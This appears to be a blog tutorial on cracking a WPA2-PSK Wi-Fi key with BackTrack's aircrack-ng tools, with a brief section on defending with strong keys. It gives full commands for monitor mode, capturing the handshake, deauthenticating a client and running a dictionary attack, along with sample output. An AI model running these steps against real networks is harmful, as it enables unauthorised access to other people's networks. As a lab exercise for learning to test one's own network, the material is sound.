1. Some background info
WPA stands for WiFi Protected Access and is a security protocol for protecting wireless networks. WPA and WPA2 have been developed in response to the serious weaknesses discovered in WEP. For information on how to crack WEP encrypted access points see this post.
2. The task
In this post we will crack a WPA2 encrypted access point which uses a preshared key. For that we will use BackTrack, our trusty pentesting distribution.
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption;
- a client connected to the access point (another laptop/smartphone/etc.)
4. Let's begin
Open a terminal window.
First things first, we need to enable monitoring mode for our wireless card.
airmon-ng start wlan0
Now that our wireless card is properly setup, let's find our network. The following command will enumerate the wireless access points and clients in range and also
provide us with useful information
The output is something like this:
CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:1F:02:4B:F9:5C -45 8 0 0 11 54e WPA2 CCMP PSK Edimax AP
10:BF:48:92:A2:80 -87 5 0 0 1 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
80:1F:02:4B:F9:5C 60:D8:19:A7:33:21 -50 0 - 5e 0 1
The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption.
We can also see that there is a wireless client with MAC address D8:50:E6:20:D1:07 being connected to our target (MAC 80:1F:02:4B:F9:5C).
We're going to need that client to get the relevant packet which we're going to crack and get the key from.
Now that we know our target it's time to get to work. We're going to have airodump-ng capture packets from our target and write them to a .cap file.
The following command will do it
airodump-ng -w EdimaxCapture --bssid 80:1F:02:4B:F9:5C --channel 11 mon0
The idea here is to catch the so-called handshake. The handshake represents a set of messages exchanged between the client and the access point which finalize with the client being authenticated (assuming he has the right key). The thing is the handshake only occurs when a client first connects to the access point. So we have two options. We either wait for a new client to connect (neah) or we could simply disconnect a connected client and let them attempt to reconnect. Since the second option sounds more interesting, let's do that. We're going to use aireplay-ng to send a deauth packet to the client.
Let's open a new terminal window and run this command:
aireplay-ng -a 80:1F:02:4B:F9:5C -c 60:D8:19:A7:33:21 --deauth 4 mon0
So we've send 4 deauth packets to the client connected to the target. Time to get back to our terminal window capturing the packets and see if anything interesting was caught:
CH 11 ][ Elapsed: 9 mins ][ 2014-01-29 14:25 ][ WPA handshake: 80:1F:02:4B:F9:5C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:1F:02:4B:F9:5C -39 100 5378 1155 2 11 54e WPA2 CCMP PSK Edimax AP
BSSID STATION PWR Rate Lost Frames Probe
80:1F:02:4B:F9:5C 60:D8:19:A7:33:21 -127 1e- 0e 0 655
Aha, seems like we caught a handshake for our target. Look at the top-right part of the output.
Now that we caught it we can stop this and start the actual cracking.
We are going to use a dictionary attack to attempt to find the password. This dictionary is merely a text file which contains a string on each line. This is where the tricky part comes. For our attack to be succesful, the key must be one of those strings. The internet is full of wordlists which you can try to use to crack a password. For the purpose of this tutorial I created a small wordlist which also contains the key for the access point.
Let's run the following command and see what comes up:
aircrack-ng -w wordlist.txt -a 2 -b 80:1F:02:4B:F9:5C EdimaxCapture-02.cap
One quick note: even though the -w argument for airodump-ng was EdimaxCapture, it created EdimaxCapture-02.cap. If you get an error when running aircrack saying that it cannot find the file, use the ls command to see what files are in the current folder.
If aircrack finds the key it will output this:
Aircrack-ng 1.1 r2178
[00:00:00] 6 keys tested (403.00 k/s)
KEY FOUND! [ Test1234 ]
Master Key : 0C 21 E6 27 23 1E AD 61 B5 29 BD FE 74 A0 89 C7
D4 77 88 92 78 D1 6D DD A8 4F 79 4A 34 32 1A 4D
Transient Key : BC 29 70 E1 CF 79 11 13 A8 BC 6A 5B 38 7E D8 C8
5F B0 51 24 51 A0 D8 6E C3 1E 8B 24 53 DD F6 A7
DF B1 71 6D 27 C5 23 55 9A 7C 17 4D C0 AC B2 27
BC 9E 72 98 C6 0E D2 6A 0E 22 49 16 19 CD 99 31
EAPOL HMAC : 30 0F 90 38 7C C2 21 4F 6A 2E 30 48 30 74 2C F6
Congratulations, you have just cracked the key.
BackTrack also provides other applications for cracking WPA. The most notable is Gerix (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Gerix-wifi-cracker-ng) which offers an intuitive GUI and point-and-click navigation. Play around and experiment.
6. How to defend
This attack is easy to fend off because it relies on guessing the key. So use something that's hard to guess. An 8 characters key with upper and lower case characters, symbols and numbers would be impossible to crack with this attack. More characters, better protection. Just don't go nuts with really long ones. I consider a 16 characters key to be more than enough (something like d!4PfY#cM&35zt@5).
7. What's next?
There is however a way to crack a WPA2-PSK encrypted access point no matter how strong the key is and that is through WPS (WiFi Protected Setup). We will cover this attack in the next post.